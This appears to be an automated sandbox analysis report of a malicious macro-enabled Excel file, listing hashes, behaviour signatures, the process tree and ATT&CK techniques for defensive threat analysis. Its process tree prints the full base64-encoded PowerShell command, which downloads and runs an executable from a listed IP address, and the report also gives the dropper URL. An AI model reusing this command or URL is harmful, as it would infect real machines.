Analysis

  • max time kernel
    300s
  • max time network
    300s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    21-10-2021 12:54

General

  • Target

    QegkD76apDUdkgmDSSbB.xlsm

  • Size

    144KB

  • MD5

    31a6c161407e0e1c22ba4c8cc7922dbd

  • SHA1

    68d27dbce6639d2360d24f3cfbd48e3f03a8c26a

  • SHA256

    c6971112e20b441f60617be0343ced897ef21ba2b298f282bbb547248c4360b3

  • SHA512

    035c4fe21e7153e13a3d5cf6013bb99e5a23ea7ca46693d8a1b6db72023d0d46fa20167da20d52ed38500ef97fe64eb42b0faa829ee5150e75484db8bbd8718d

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://3.64.251.139/vr/r/QegkD76apDUdkgmDSSbB.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Deletes itself 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\QegkD76apDUdkgmDSSbB.xlsm
    1⤵
    • Deletes itself
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: RenamesItself
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1748
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c Mbefiusocvqwxsbfo.bat
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1820
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBZAGQAbgBhAGcAZwBtAHQAbwB5AGMAawB5AGgAaQBjAG0AcwBiAGsAYgBtAGQALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwAzAC4ANgA0AC4AMgA1ADEALgAxADMAOQAvAHYAcgAvAHIALwBRAGUAZwBrAEQANwA2AGEAcABEAFUAZABrAGcAbQBEAFMAUwBiAEIALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:924
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
      PID:1824

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Documents\Mbefiusocvqwxsbfo.bat
      MD5

      52d685c5a6f1e37d97649a5d76a53f52

      SHA1

      189724df16f5cebb6887689181014bb9901cd74d

      SHA256

      385c2daf04f2d9042c38d2c6823a2fa5837cfd15dfb4e607749d68d8b7ef5736

      SHA512

      0a6e8a5e298f1ec15c340d17c2da0531d9360c1c426000dd2b38d8852311942d9df90c759741060eca58b95b0184c33c6336f0a2ec8d2c3cf8bd692b2aa340eb

    • memory/924-60-0x0000000000000000-mapping.dmp
    • memory/924-61-0x0000000075B71000-0x0000000075B73000-memory.dmp
      Filesize

      8KB

    • memory/924-62-0x0000000000340000-0x0000000000341000-memory.dmp
      Filesize

      4KB

    • memory/924-63-0x0000000000341000-0x0000000000342000-memory.dmp
      Filesize

      4KB

    • memory/924-64-0x0000000000342000-0x0000000000344000-memory.dmp
      Filesize

      8KB

    • memory/1748-55-0x000000002FA51000-0x000000002FA54000-memory.dmp
      Filesize

      12KB

    • memory/1748-56-0x0000000071C31000-0x0000000071C33000-memory.dmp
      Filesize

      8KB

    • memory/1748-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1820-58-0x0000000000000000-mapping.dmp
    • memory/1824-65-0x000007FEFC441000-0x000007FEFC443000-memory.dmp
      Filesize

      8KB